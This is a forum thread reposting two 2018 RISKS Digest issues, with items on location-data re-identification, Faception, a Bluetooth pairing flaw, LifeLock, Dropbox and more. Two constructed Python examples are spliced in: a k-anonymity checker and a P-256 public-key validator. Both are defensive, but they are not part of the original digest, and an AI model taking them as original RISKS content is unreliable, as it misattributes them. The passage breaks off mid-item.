    More recently, Yves-Alexandre de Montjoye, a computational privacy
    researcher, showed how the vast majority of the population can be identified
    from the behavioural patterns revealed by location data from mobile
    phones. By analysing a mobile phone database of the approximate locations
    (based on the nearest cell tower) of 1.5 million people over 15 months (with
    no other identifying information) it was possible to uniquely identify 95%
    of the people with just four data points of places and times. About 50%
    could be identified from just two points.

    The four points could come from information that is publicly available,
    including a person's home address, work address and geo-tagged Twitter
    posts.

    ------------------------------
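    The re-identification risk the Guardian piece above describes can be measured before a data set is released. As an added example (not from the article, the digest, or any of the research groups named), the block below scores a constructed "de-identified" extract on Sweeney's quasi-identifiers (5-digit ZIP, date of birth, gender): how many records are unique on those fields, and how generalising them before release changes that. The records and the release policies are constructed for the sample.

```python
# Added example (not from the Guardian article or the digest): measuring the
# re-identification risk of a "de-identified" extract before release, using
# Sweeney's quasi-identifiers (5-digit ZIP, date of birth, gender).
from __future__ import annotations

from collections import Counter
from dataclasses import dataclass

# Constructed sample extract: direct identifiers (name, address, SSN) already
# stripped, quasi-identifiers left in.  Columns: (zip, date of birth, gender)
RECORDS = [
    ("02139", "1945-07-31", "M"),
    ("02138", "1945-07-31", "M"),
    ("02139", "1945-03-12", "M"),
    ("02139", "1949-09-01", "F"),
    ("02139", "1943-02-20", "F"),
    ("02134", "1972-11-02", "F"),
    ("02134", "1972-11-02", "F"),
    ("02101", "1975-06-06", "F"),
    ("02134", "1960-01-15", "M"),
    ("02134", "1960-01-15", "M"),
]


@dataclass(frozen=True)
class Policy:
    """How much of each quasi-identifier survives in the released data."""
    zip_digits: int = 5      # leading ZIP digits kept
    dob: str = "day"         # "day", "year" or "decade"
    gender: bool = True      # keep the gender column?


RAW = Policy()                                 # as the extract was released
COARSE = Policy(zip_digits=3, dob="decade")    # a generalised release


def generalize(record, policy: Policy) -> tuple:
    """Apply the release policy to one record, returning the values a reader
    of the published data would actually see."""
    zip_code, dob, gender = record
    if policy.dob == "day":
        when = dob
    elif policy.dob == "year":
        when = dob[:4]
    elif policy.dob == "decade":
        when = dob[:3] + "0s"          # "1945-07-31" -> "1940s"
    else:
        raise ValueError(f"unknown dob granularity {policy.dob!r}")
    return (zip_code[: policy.zip_digits], when, gender if policy.gender else "*")


def equivalence_classes(records, policy: Policy) -> Counter:
    """Group records that are indistinguishable on the released fields."""
    return Counter(generalize(r, policy) for r in records)


def min_k(records, policy: Policy) -> int:
    """k-anonymity of the release: size of the smallest equivalence class."""
    return min(equivalence_classes(records, policy).values())


def unique_fraction(records, policy: Policy) -> float:
    """Share of records that are alone in their class, i.e. that a single
    matching public record (voter roll, news story) would pin to one person."""
    classes = equivalence_classes(records, policy)
    singletons = sum(1 for size in classes.values() if size == 1)
    return singletons / len(records)


def release_ok(records, policy: Policy, k: int = 2) -> bool:
    """Gate a release on a minimum k; the threshold is a policy choice."""
    return min_k(records, policy) >= k


if __name__ == "__main__":
    for name, pol in (("raw", RAW), ("coarse", COARSE)):
        print(f"{name:>6}: k={min_k(RECORDS, pol)} "
              f"unique={unique_fraction(RECORDS, pol):.0%} "
              f"release_ok={release_ok(RECORDS, pol)}")
```

On the sample, the raw release leaves 60% of records unique on the three fields; truncating ZIP to three digits and birth date to a decade brings every class to at least two records.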

    Date: Sat, 14 Jul 2018 19:18:10 -0700
    From: Rob Slade <rms...@shaw.ca>
    Subject: Re: FACEPTION (Goldberg, RISKS-30.75)

    Oi.

    Creepy social engineering is one thing.
    https://community.isc2.org/t5/Indus...y-social-engineering-fraud-or-prank/m-p/12364 or https://is.gd/j5MNCT

    Basing law enforcement, physical security, investigations, and job
    interviews on highly questionable premises is quite another.

    Faception claims to be able to "reveal personality from facial images" and
    "dramatically improve public safety, communications, decision-making, and
    experiences." How? Well, after some buzzword filled marketing jargon about
    "first-to-technology and first-to-market with proprietary computer vision
    and machine learning technology" and mention of the magic word "biometrics,"
    if you persist you may be able to find the theory behind the technology. It
    seems to boil down to the following logic:

    1) DNA can determine (certain) personality traits (sometimes to a significant
    extent). (This is true, with the provisos I've put in parentheses.)
    2) DNA can determine how you look.

    THEREFORE:

    Your personality is determined by how you look.

    (Finding the flaws in this argument is left as an exercise for students of
    logic.)

    I am inescapably reminded of the "bomb detectors" sold to Afghani and Iraqi
    security forces that had no detection capabilities at all, and caused large
    numbers of deaths. That's on the false negative side. The potential damage
    caused on the false positive side are likely considerably greater ...

    Of course, there's always:

    > Date: Sat, 14 Jul 2018 08:46:31 -0700
    > From: "Peter G. Neumann" <neu...@csl.sri.com>
    > Subject: Regulation of facial-recognition software? (WashPo)

    ------------------------------

    Date: Sun, 15 Jul 2018 09:02:32 -0500
    From: Dmitri Maziuk <dma...@bmrb.wisc.edu>
    Subject: Re: Employees as subjects in clinical trials (Fenichel, RISKS-30.75)

    Last I heard El Al ground crews still fly the plane they serviced (always
    have), and they still are fully at liberty to seek gainful employment
    elsewhere. I'm not quite sure what makes med AI coders so different --
    though in all fairness I would draw the line at family members. I think El
    Al does.

    ------------------------------

    Date: Tue, 17 Jul 2018 00:44:04 +0300
    From: Amos Shapir <amo...@gmail.com>
    Subject: Re: Video: Gavin Williamson hilariously interrupted by Siri
    during statement to Parliament (RISKS-30.75)

    It seems that what had triggered Siri was the mention of "*a Syri*an
    democratic force". Conclusion: Don't bring Siri to a discussion about
    Syria...

    (And also be careful when talking about "*a Lexus*" or "*a court ana*lyzer")

    ------------------------------

    Date: Thu, 19 Jul 2018 9:55:35 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Sami Saydjari: Engineering Trustworthy Systems

    Here's a book that might be of interest to RISKS readers who are serious
    about developing systems that must be much more trustworthy. It is quite
    comprehensive, addressing many problems that have been discussed in RISKS.
    It may not be a complete answer on how to fully turn the attainment of
    trustworthy systems into a true engineering discipline, but it should be
    very helpful to anyone pursuing the creation of such a discipline -- which
    today does not seem to exist.

    O. Sami Saydjari
    Engineering Trustworthy Systems:
    Get Cybersecurity Design Right the First Time
    McGraw-Hill Education, 2018
    xlvii+540, $60.00
    ISBN 978-1-260-11817-9

    Sami has extensive background (NSA, DARPA), and has managed to squeeze a lot
    of it into the book.

    http://www.engineeringtrustworthysystems.com

    The endorsements on the back cover and front-end material are copious, so I
    am not going to even begin to cite some of them here. They are available at
    https://samisaydjari.com/reviews-1/ .

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.76
    ************************
     
  12. LakeGator

    Risks Digest 30.77

    RISKS List Owner

    Jul 30, 2018 2:57 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Monday 30 July 2018 Volume 30 : Issue 77

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    California Wants to Reinvent the Power Grid. So What Could Go Wrong?
    (NYTimes)
    Reporter Shows The Links Between The Men Behind Brexit And The
    Trump Campaign (NPR)
    Russian Hackers Reach U.S. Utility Control Rooms, Homeland Security
    Officials Say (WSJ)
    Israeli researchers say they've found better way to spot malicious
    emails (The Times of Israel)
    Man in the middle (Forbes e-news)
    Senator vs. Flash (Fortune)
    Decade-Old Bluetooth Flaw Lets Hackers Steal Data Passing Between
    Devices (Dan Goodin)
    Today, 100 Americans Will Likely Die on Our Roads (New York Times)
    The Ordinary License Plate's Days May Be Numbered (NYTimes)
    LifeLock Bug Exposed Millions of Customer Email Addresses (Krebs)
    For Sale: Survey Data on Millions of High School Students (NYTimes)
    First Ringless Voicemail Message TCPA Decision Sides With Plaintiff
    (Manatt)
    Travelodge data hacked in 'security incident' (The Caterer)
    Indictment: Wichita Attorney Brad Pistotnik, software engineer
    charged in alleged cyberattacks (KWCH)
    When a Stranger Decides to Destroy Your Life (Gizmodo)
    Second-hand land rover data may stay under control of first owner
    (The Register)
    This company is building a massive pack of robot dogs for purchase
    starting in 2019 (WashPo)
    Waymo partners with Walmart to shuttle customers in self-driving cars
    (WashPo)
    Cox phone service alert (Gabe Goldberg)
    Nintendo to ROM sites: Forget cease-and-desist, now we're suing
    (Ars Technica)
    Venmo's terrible idea (Ars Technica)
    Boston woman temporarily becomes a millionaire after an account mix-up
    (The Boston Globe)
    A few extra zeroes causes a big headache (The Boston Globe)
    Uber driver is livestreaming riders without their knowledge or consent
    (StL Today via Lauren Weinstein)
    Wild About Tech, China Even Loves Robot Waiters That Can't Serve (NY Times)
    MASSIVE ethical failure and privacy violation by Dropbox (WiReD)
    Was It Ethical for Dropbox to Share Customer Data with Scientists? (WiReD)
    Why is Google Translate spitting out sinister religious prophecies?
    (Motherboard)
    Google DRM for Email can be disabled by ticking a few boxes in
    Firefox (Boing Boing)
    How Google's Safe Browsing Helped Build a More Secure Web (WiReD)
    Orrin Hatch tweeted at Google that he's not dead (Insider)
    Nationals' Trea Turner is the latest MLB player to have ugly tweets
    uncovered (WashPo)
    Braves' Sean Newcomb addresses ugly old tweets right after just
    missing a no-hitter (WashPo)
    Data allowing people to print out their own guns temporarily
    blocked from Internet in PA, after legal pressure. (WashPo)
    Re: employees as subjects in clinical trials (Robert R. Fenichel)
    A few short replies to RISKS-30.76 (Jeff Jonas)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Sat, 21 Jul 2018 10:03:02 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: California Wants to Reinvent the Power Grid. So What Could Go Wrong?
    (NYTimes)

    California Wants to Reinvent the Power Grid. So What Could Go Wrong?

    Two decades ago, a new approach to power delivery led to blackouts. Now the
    state is considering another energy makeover: a regional electric grid.

    ------------------------------

    Date: Fri, 20 Jul 2018 22:43:30 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Reporter Shows The Links Between The Men Behind Brexit And The
    Trump Campaign (NPR)



    ------------------------------

    Date: Tue, 24 Jul 2018 19:00:46 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Russian Hackers Reach U.S. Utility Control Rooms, Homeland Security
    Officials Say (WSJ)

    Blackouts could have been caused after the networks of trusted vendors were
    easily penetrated

    Russian Hackers Reach U.S. Utility Control Rooms, Homeland Security Officials Say

    ------------------------------

    Date: Fri, 20 Jul 2018 19:53:24 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Israeli researchers say they've found better way to spot malicious
    emails (The Times of Israel)

    ``Existing email analysis solutions only analyze specific email elements
    using rule-based methods, and don't analyze other important parts,'' said
    Nir Nissim, head of the David and Janet Polak Family Malware Lab at the
    cyber department of the university. Antivirus software solutions mainly use
    ``signature-based detection methods, and therefore are insufficient for
    detecting new, unknown malicious emails.''

    The new method, called Email-Sec-360, was developed by Aviad Cohen, a PhD
    student and researcher at the BGU Malware Lab. The research, published in
    the scientific journal Expert Systems with Applications, is based on machine
    learning methods and makes use of 100 general descriptive features extracted
    from the various components of emails, including the header, its body and
    attachments. The methodology provides ``enhanced threat detection in real
    time,'' the statement said.

    Israeli researchers say they’ve found better way to spot malicious emails

    Perhaps too narrow and general description of "existing" solutions and too
    excited about "machine learning methods and makes use of 100 general
    descriptive features".

    ------------------------------

    Date: Thu, 26 Jul 2018 09:52:35 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Man in the middle (Forbes e-news)

    A pair of Israeli researchers found a flaw in the encryption scheme securing
    *Bluetooth* file transfers that could allow hackers to steal data. Many
    device makers have already issued security patches, so make sure your phone
    software is up to date.

    ------------------------------

    Date: Fri, 27 Jul 2018 18:33:11 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Senator vs. Flash (Fortune)

    *Out of the frying pan*. The once-ubiquitous (and hated by Steve Jobs) web
    display software known as *Flash* is going away in less than two years,
    according to its maker, *Adobe*. But the U.S. government hasn't got the
    message, prompting Sen. Ron Wyden to send a letter to three federal agencies
    to get a move on removing Flash pronto. The software has "serious, largely
    unfixable cybersecurity issues," Wyden wrote.


    ------------------------------

    Date: Mon, 30 Jul 2018 12:23:48 -0400
    From: ACM TechNews <technew...@acm.org>
    Subject: Decade-Old Bluetooth Flaw Lets Hackers Steal Data Passing Between
    Devices (Dan Goodin)

    Ars Technica (07/25/18) Dan Goodin via ACM TechNews, Monday, July 30, 2018

    A study from the Technion-Israel Institute of Technology warns of a
    decade-old bug in the Bluetooth specification that allows hackers to
    intercept and tamper with data shared wirelessly through man-in-the-middle
    attacks on the link between devices. Not only can hackers view the data,
    but they can forge keystrokes on a Bluetooth keyboard to open up a command
    window or malicious website. Says security engineer JP Smith, "This attack
    lets an attacker who can read and modify Bluetooth traffic during pairing
    force the key to be something they know." The researchers say the attack is
    enabled by two design flaws: one involves sending both the x-coordinate and
    the y-coordinate during the public key exchange, while the other is the
    protocol's authentication of only the x-coordinate.

    http://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-1c2c9x21684dx072162&

    ------------------------------
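    The fix the two design flaws above point at (for this item and for the Forbes "Man in the middle" item earlier in this issue) is to validate the whole received public key, not just its x-coordinate. As an added example, not code from the Ars Technica article or from any Bluetooth stack, the block below checks that a peer's P-256 point actually lies on the curve before it is used, and contrasts that with an x-only check. Curve constants are the FIPS 186-4 P-256 parameters, which Bluetooth Secure Connections pairing uses; the 64-byte big-endian X||Y layout in parse_uncompressed is an assumption for the sample, not the SMP PDU format.

```python
# Added example (not the article's or any Bluetooth stack's code): full
# validation of a peer's ECDH public key before it is used in pairing.
# Curve constants are NIST P-256 from FIPS 186-4.  The 64-byte big-endian
# wire layout below is an assumption for this sample, not the SMP format.
from __future__ import annotations

# P-256 domain parameters: y^2 = x^3 + A*x + B (mod P)
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
# Base point G: a known-good public key to exercise the checks with
GX = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
GY = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5


def is_on_curve(x: int, y: int) -> bool:
    """True iff (x, y) satisfies the P-256 curve equation, with both
    coordinates already reduced into [0, P)."""
    if not (0 <= x < P and 0 <= y < P):
        return False
    return (y * y - (x * x * x + A * x + B)) % P == 0


def validate_x_only(x: int) -> bool:
    """The weak check the article describes: only the x-coordinate is
    authenticated, so whatever y the peer sent is accepted unexamined."""
    return 0 <= x < P


def validate_peer_public_key(x: int, y: int) -> tuple[bool, str]:
    """What a patched stack should do on every received public key.
    P-256 has cofactor 1, so an on-curve affine point is automatically in
    the prime-order group; no separate small-subgroup check is needed."""
    if not (0 <= x < P and 0 <= y < P):
        return False, "coordinate out of range"
    if not is_on_curve(x, y):
        return False, "point is not on P-256"
    return True, "ok"


def parse_uncompressed(raw: bytes) -> tuple[int, int]:
    """Split a 64-byte X||Y key into integers (big-endian, assumed here)."""
    if len(raw) != 64:
        raise ValueError("expected 64 bytes of X||Y")
    return int.from_bytes(raw[:32], "big"), int.from_bytes(raw[32:], "big")


def accept_pairing_key(raw: bytes) -> bool:
    """Receive-path gate: parse, then validate both coordinates."""
    x, y = parse_uncompressed(raw)
    ok, _reason = validate_peer_public_key(x, y)
    return ok


if __name__ == "__main__":
    genuine = GX.to_bytes(32, "big") + GY.to_bytes(32, "big")
    # Constructed: same x, but y with its low bit flipped (no longer on the curve)
    malformed = GX.to_bytes(32, "big") + (GY ^ 1).to_bytes(32, "big")
    for label, key in (("genuine", genuine), ("malformed", malformed)):
        x, y = parse_uncompressed(key)
        print(f"{label:>9}: x-only={validate_x_only(x)} "
              f"full={validate_peer_public_key(x, y)}")
```

The x-only check returns True for both keys; the full check rejects the malformed one, which is the behaviour the patches described in the article restore.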

    Date: Sat, 28 Jul 2018 10:50:01 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Today, 100 Americans Will Likely Die on Our Roads (New York Times)

    Opinion | Today, 100 Americans Will Likely Die on Our Roads

    "But the current mismatch between the attention to driverless cars and the
    attention to driver-operated cars is a big mistake. We're acting as if the
    status quo is fine, and the only problem is some risky newfangled
    technology. In reality, the status quo is a public-health crisis, and a
    preventable one.

    "Today, another 100 or so Americans -- many of them young and healthy --
    will likely die in human-driven vehicle crashes. Even more Americans are
    likely to die on Saturday, the deadliest day of the week on the roads. The
    terrible toll will continue every day after that, until we decide to do
    something about it."

    ~100 deaths per day from carbon-based drivers v. 3 documented silicon-
    related vehicle deaths to date.

    Risk is usually characterized by severity (critical, high, medium, low)
    and probability (high, medium, low) attributes. One alternative
    characterization is RISK = HAZARD + OUTRAGE. This expression clearly
    quantifies a risk: (1) a known hazard; and, (2) accompanying outrage
    if/when the hazard materializes.
    (Risk = Hazard + Outrage: Coping with Controversy about Utility Risks, Peter M. Sandman website)

    By the 2nd risks characterization, AV hazard is trivial compared to
    daily experience, but each AV incident is disproportionately accorded
    hyperbolic viral media attention (exponentiated outrage).

    ------------------------------

    Date: Sat, 28 Jul 2018 11:05:54 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: The Ordinary License Plate's Days May Be Numbered (NYTimes)

    (The New York Times, 26 Jul 2018)
    The Ordinary License Plate’s Days May Be Numbered

    Another Internet of mistakes target awaiting exploitation by a botnet near
    you.

    ------------------------------

    Date: Wed, 25 Jul 2018 19:09:36 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: LifeLock Bug Exposed Millions of Customer Email Addresses (Krebs)

    via NNSquad
    LifeLock Bug Exposed Millions of Customer Email Addresses — Krebs on Security

    Identity theft protection firm LifeLock -- a company that's built a name
    for itself based on the promise of helping consumers protect their
    identities online -- may have actually exposed customers to additional
    attacks from ID thieves and phishers. The company just fixed a
    vulnerability on its site that allowed anyone with a Web browser to index
    email addresses associated with millions of customer accounts, or to
    unsubscribe users from all communications from the company.

    Pretty much the oldest trick in the book, too.

    [Gabe Goldberg noted that *LifeLock* wasn't protecting its customers'
    email addresses, which could be seen on the web. The service went offline
    briefly on Wednesday to fix the leaky web page.]

    ------------------------------

    Date: Mon, 30 Jul 2018 10:58:54 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: For Sale: Survey Data on Millions of High School Students (NYTimes)

    For Sale: Survey Data on Millions of High School Students

    College-planning surveys give a peek into the opaque and little-regulated
    market of data-mining of minors.

    ------------------------------

    Date: Mon, 30 Jul 2018 09:51:01 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: First Ringless Voicemail Message TCPA Decision Sides With Plaintiff
    (Manatt)

    First Ringless Voicemail Message TCPA Decision Sides With Plaintiff

    ------------------------------

    Date: Sat, 28 Jul 2018 14:05:26 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Travelodge data hacked in 'security incident' (The Caterer)

    http://www.thecaterer.com/articles/531764/travelodge-data-hacked-in-security-incident

    ------------------------------

    Date: Mon, 23 Jul 2018 00:38:47 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Indictment: Wichita Attorney Brad Pistotnik, software engineer
    charged in alleged cyberattacks

    http://www.kwch.com/content/news/In...Was-Working-for-Wichita-Lawyer-488441491.html

    ------------------------------

    Date: Sat, 28 Jul 2018 23:57:52 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: When a Stranger Decides to Destroy Your Life (Gizmodo)

    Monika Glennon has lived in Huntsville, Alabama, for the last 12 years.
    Other than a strong Polish accent, she fits a certain stereotype of the
    All-American life. She's blonde. Her husband is a veteran Marine. Her two
    children, a boy and a girl, joined the military as adults. She sells houses
    -- she's a real estate agent at Re/Max -- helping others realize their own
    American dream.

    But in September 2015, she was suddenly plunged into an American
    nightmare. She got a call at 6 a.m. one morning from a colleague at Re/Max
    telling her something terrible had been posted about her on the Re/Max
    Facebook page. Glennon thought at first she meant that a client had left her
    a bad review, but it turned out to be much worse than that.

    http://gizmodo.com/when-a-stranger-decides-to-destroy-your-life-1827546385

    The risk? People.

    ------------------------------

    Date: Sun, 29 Jul 2018 19:33:08 +0200
    From: Benoit Goas <goa...@hawk.iit.edu>
    Subject: Second-hand land rover data may stay under control of first owner
    (The Register)

    Some land rovers can be linked to an account allowing one to track them, unlock
    them and more. It has to be transferred / disabled on car sale, if you
    don't forget about it and/or go through an official car dealer... Else the
    first owner keeps some control over the car!

    http://www.theregister.co.uk/2018/07/27/jaguar_land_rover_connected_car_privacy/

    ------------------------------

    Date: Fri, 27 Jul 2018 09:44:09 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: This company is building a massive pack of robot dogs for purchase
    starting in 2019 (WashPo)

    http://www.washingtonpost.com/techn...k-robot-dogs-purchase-starting/?noredirect=on

    "These robots from Boston Dynamics are incredibly rugged and robust, which
    makes them capable of addressing the clutter and uncertainty of our
    chaotic human world," Srinivasa said. "Some people watching the robot
    on video find their capabilities scarily anthropomorphic and humanlike,
    but to me it shows that there is a robot I can have in my home that will
    not break things or harm people."

    This bot brings new meaning to the term "doggie breath." I wonder if it
    can be trained to play fetch, retrieve a newspaper, or bark at
    strangers? The idea of doggiebot as a household pet is unsettling. Safe
    for the whole family, especially cats and infants?

    A robot bull in a china-shop should it misinterpret a voice-
    communicated command (if that sensor interface is sponsored).

    ------------------------------

    Date: Thu, 26 Jul 2018 16:45:56 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Waymo partners with Walmart to shuttle customers in self-driving
    cars (WashPo)

    http://www.washingtonpost.com/techn...le-customers-self-driving-cars/?noredirect=on

    Probably safer to send Boston Dynamics' SpotMini with a shopping list to
    fetch pretzels and beer than take a WayMo.
    (http://www.washingtonpost.com/techn...ng-massive-pack-robot-dogs-purchase-starting/)

    ------------------------------

    Date: Fri, 27 Jul 2018 16:09:11 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Cox phone service alert

    Fun with VoIP...

    -------- Forwarded Message --------
    > Subject: If you have Cox phone service you may experience trouble
    > contacting 9-1-1. All Fairfax County 9-1-1 functions are in service.
    > Date: Fri, 27 Jul 2018 17:21:43 +0000 (UTC)

    *This is a message from Fairfax Alerts*

    If you have Cox phone service you may experience trouble contacting 9-1-1.
    All Fairfax County 9-1-1 functions are in service. Please use a wireless
    phone to reach 9-1-1 if you experience trouble. Text-to-9-1-1 is also
    available.

    The cause of the issue is a Cox Communications service interruption near the
    area of Georgetown Pike and Bellview Road. There is not an estimated time of
    repair at this time.

    ------------------------------

    Date: Tue, 24 Jul 2018 00:02:46 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Nintendo to ROM sites: Forget cease-and-desist, now we're suing
    (Ars Technica)

    http://arstechnica.com/gaming/2018/07/nintendo-to-rom-sites-forget-cease-and-desist-now-were-suing/

    ------------------------------

    Date: Tue, 24 Jul 2018 00:05:12 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Venmo's terrible idea (Ars Technica)

    http://arstechnica.com/tech-policy/2018/07/venmos-terrible-idea/

    ------------------------------

    Date: Sat, 21 Jul 2018 02:53:02 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Boston woman temporarily becomes a millionaire after an account mix-up
    (The Boston Globe)

    http://www.boston.com/news/local-ne...becomes-a-millionaire-after-an-account-mix-up

    ------------------------------

    Date: Sat, 21 Jul 2018 03:19:44 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: A few extra zeroes causes a big headache (The Boston Globe)

    http://www.bostonglobe.com/business...ig-headache/8kquT0q25v8XH6mYTzLt9N/story.html

    Somehow, instead of paying $182.36 and $92.60 via her online account, she
    paid $18,236 and $9,260. Whether she inadvertently typed in a couple of
    extra zeros -- thus paying 100 times what she owed -- or the software on her
    account went haywire, she doesn't know. ...

    ------------------------------

    Date: Sat, 21 Jul 2018 07:56:30 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Uber driver is livestreaming riders without their knowledge or consent

    via NNSquad [UNACCEPTABLE!]

    St. Louis Uber driver has put video of hundreds of passengers online.
    Most have no idea.

    http://www.stltoday.com/news/local/...cle_9060fd2f-f683-5321-8c67-ebba5559c753.html

    But there was something the women didn't know: Their driver was streaming
    a live video of them to the Internet, and comments from viewers were
    pouring in. The blonde is a 7, the brunette a 5, someone with the
    username "DrunkenEric" commented. "She doesn't sit like a lady though,"
    another viewer added. "This is creepy," said another. The women are
    among hundreds of St. Louis area Uber passengers who have been streamed
    online without their knowledge by their driver, Jason Gargac, 32, of
    Florissant. Gargac has given about 700 rides in the area since March
    through Uber, plus more with Lyft. Nearly all have been streamed to his
    channel on Twitch, a live video website popular with video gamers where
    Gargac goes by the username "JustSmurf." Passengers have included
    children, drunk college students and unwitting public figures such as a
    KSDK reporter and Jerry Cantrell, lead guitarist with the band Alice in
    Chains. First names, and occasionally full names, are revealed. Homes are
    shown. Passengers have thrown up, kissed, talked trash about relatives and
    friends and complained about their bosses in Gargac's truck. All the
    while, an unseen online audience watches, evaluating women's bodies,
    judging parents and mocking conversations.

    UNACCEPTABLE! Irrespective of the legality, Uber, Lyft, and other similar
    services must ban this practice among their drivers, or face serious
    repercussions going forward. Drivers violating such bans must be excised
    from the services. This must be dealt with IMMEDIATELY or these services
    risk losing all trust from their passengers.

    ------------------------------

    Date: Sun, 22 Jul 2018 13:18:16 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Wild About Tech, China Even Loves Robot Waiters That Can't Serve
    (NY Times)

    http://www.nytimes.com/2018/07/21/technology/china-future-robot-waiters.html

    Whereas comp.risks readers are generally inured (or incensed) by
    technology's weaknesses and vulnerabilities, the PRC's population embraces
    robotic service deployment. Novelty impresses, especially if there's a yuan
    to earn from it.

    "Waiters said their automated counterparts caused more work than they
    saved. The robots take trays of food out to customers, but are unable to
    lower them to the table. Real waiters stand back so photos and videos can
    be taken before shuffling in and serving food the old-fashioned way.

    "The robots also break down. Three times during an hour lunch, a waiter
    had to lean a robot on its side and take a blowtorch to the undercarriage
    to burn out food and trash caught in its axles. When asked whether he was
    worried that the robots would take his job, the waiter laughed.

    "Still, patrons were impressed.

    "I've just been to America, and I didn't see many new things at all," said
    Xie Aijuan, a retiree in her 50s. "I don't think they have anything like
    robotic restaurants there."

    "China is surpassing America," agreed her dining companion, Zhuang
    Jiazheng. "Robots are coming. Tech is advancing. It's all a matter of
    time."

    A Caesar salad served by R2D2 today, and a killbot tomorrow. PRC
    investors, especially the government, look long term for returns.

Will a no-op robot restaurant open in the US? When customers assent to
restaurant owner indemnification against a hot bouillabaisse spill or
flambé by Bananas Foster.

    ------------------------------

    Date: Tue, 24 Jul 2018 17:38:08 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: MASSIVE ethical failure and privacy violation by Dropbox (WiReD)

    via NNSquad
    http://www.wired.com/story/dropbox-sharing-data-study-ethics/

    But it still appears this research was conducted without the express
    consent of the thousands of customers whose information Dropbox and the
    researchers accessed (the HBR article originally suggested that 400,000
    users' data was analyzed, while Dropbox says that the study dealt with
    data from 16,000 customers). Late Tuesday HBR added a second editors' note
    indicating that the researchers started with information on 400,000
    "unique users" but pared the data set down to 16,000 after incorporating
    data from Web of Science. HBR editors also updated the article to
    indicate that it wasn't 1,000 universities that were included, but rather
    1,000 separate departments. Informed consent, one of the cornerstones of
    academic research, is one of the things that got Facebook in so much
    trouble back in 2014 ...

    ------------------------------

    Date: Wed, 25 Jul 2018 09:40:30 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Was It Ethical for Dropbox to Share Customer Data with Scientists?
    (WiReD)

    <http://www.dropbox.com/privacy>

    Dropbox representatives told WIRED that users gave consent when they agreed
    to the company's privacy terms and pointed to a section of that policy about
    how data will be used to improve Dropbox services. That section reads: "We
    collect information related to how you use the Services, including actions
    you take in your account (like sharing, editing, viewing, and moving files
    or folders). We use this information to improve our Services, develop new
    services and features, and protect Dropbox users." They also pointed to
    language about sharing data with third parties, which says "Dropbox uses
